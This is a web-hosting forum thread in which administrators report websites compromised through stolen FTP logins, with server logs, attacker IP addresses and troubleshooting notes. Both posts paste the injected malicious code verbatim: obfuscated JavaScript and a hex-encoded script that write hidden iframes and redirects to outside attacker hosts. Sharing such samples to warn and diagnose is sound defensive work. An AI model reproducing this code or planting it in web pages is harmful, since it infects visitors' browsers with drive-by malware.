IP addresses from IFrame Hacks

claudio

Well-Known Member
Jul 31, 2004
201
0
166
sadly it happened to me today

WARNING do not run this code it trys also to redirect to blacksun-sl.com/arm/index.php

<!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,22,35,48,8,18,24,29,21,0,0,0,0,0,0,36,60,52,47,43,44,3,62,15,9,0,55,19,5,40,57,42,56,33,34,26,7,61,11,27,12,17,0,0,0,0,53,0,37,59,25,6,10,51,13,54,23,45,20,38,41,2,49,46,30,16,28,50,58,32,4,31,1,14);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("ctA4iLYtJiN_iXYlUhsBZiV1ePQoILEozXgBW3N_ICNoe3ESwxgtetAtyFsKW28f9x7R6fs4ZKYlU2ORMhY4YWsfZ3OR9qQlcP5fFxgo5FAl")</script><!-- ~ --><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,22,35,48,8,18,24,29,21,0,0,0,0,0,0,36,60,52,47,43,44,3,62,15,9,0,55,19,5,40,57,42,56,33,34,26,7,61,11,27,12,17,0,0,0,0,53,0,37,59,25,6,10,51,13,54,23,45,20,38,41,2,49,46,30,16,28,50,58,32,4,31,1,14);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("ctA4iLYtJiN_iXYlUhsBZiV1ePQoILEozXgBW3N_ICNoe3ESwxgtetAtyFsKW28f9x7R6fs4ZKYlU2ORMhY4YWsfZ3OR9qQlcP5fFxgo5FAl")</script>


1)first this thing came from my personal FTP account

Jan 24 01:14:03 main pure-ftpd: ([email protected])

2) my password was strong

3) if there was an mallware/spyware trojan or keylogger in my desktop computer? well give me a few days and we will know because i did change the FTP password from all my machines and i will not use FTP and will track /var/log/messages to see if this Fellow can "guess" my password using his magic trojan or if a very comon DC has a sniffer in his network what is not the case (it apparently started near to a FTP session of mine, but i mean aparently not clearly)

4) php insecure permissions or scripts were not found in my server i know how it is and was just pure-ftpd

before in the "less-secure" proftpd it didnt happen i look this threads since Jan/2007 when they started

thinking on change back to proftp

5) other customers weren't affected

6) some system crashs and lockup freeze issues happened near to this also

7) kernel, cpanel, perl all uptodate since the cpanel10 to cpanel11 change

8) also checked http://www.cpanel.net/security/notes/random_js_toolkit.html but this is not (by now) my case as there is no rootkit or root access at all despite of this FTP sucessfull attempts

9)chmod -w *.* in my public_html

if the hacker make again i will disable my FTP USER permanently...
 

ModServ

Well-Known Member
Oct 17, 2006
337
5
168
Egypt
cPanel Access Level
Root Administrator
FTP connection with user password from: 77.221.133.186

code added to index.htnl
Code:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4757fc58cd991(v4757fc58ce18a){ function v4757fc58ce999 () {return 16;} return(parseInt(v4757fc58ce18a,v4757fc58ce999()));}function v4757fc58cf989(v4757fc58d0183){ var v4757fc58d1171=2; var v4757fc58d097a='';for(v4757fc58d0d7d=0; v4757fc58d0d7d<v4757fc58d0183.length; v4757fc58d0d7d+=v4757fc58d1171){ v4757fc58d097a+=(String.fromCharCode(v4757fc58cd991(v4757fc58d0183.substr(v4757fc58d0d7d, v4757fc58d1171))));}return v4757fc58d097a;} document.write(v4757fc58cf989('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633737386536356239373065207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B273031665C272077696474683D353136206865696768743D333831207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
code contain links to:
Code:
http://77.221.133.188/.if/go.html?19427401f
http://77.221.133.188/.dif/go.php?sid=1
http://77.221.133.189/.sp/in.cgi?p=t
The same here with the same IP

Look

Code:
Jan 29 10:11:52 server7 pure-ftpd: ([email protected]) [INFO] New connection from 77.221.133.186
Jan 29 10:11:52 server7 pure-ftpd: ([email protected]) [INFO] xxxxx is now logged in
Jan 29 10:12:03 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/suspended.page/index.html downloaded  (4521 bytes, 18025.59KB/sec)
Jan 29 10:12:04 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/suspended.page/index.html uploaded  (4401 bytes, 26.92KB/sec)
Jan 29 10:12:05 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/vb/index.php downloaded  (17803 bytes, 649.81KB/sec)
Jan 29 10:12:06 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/vb/index.php uploaded  (18785 bytes, 28.79KB/sec)
Jan 29 10:12:07 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/vb/login.php downloaded  (10275 bytes, 760.74KB/sec)
Jan 29 10:12:08 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/vb/login.php uploaded  (10332 bytes, 31.66KB/sec)
Jan 29 10:12:09 server7 pure-ftpd: ([email protected]) [INFO] Logout.
!!!!

What will be done about this ??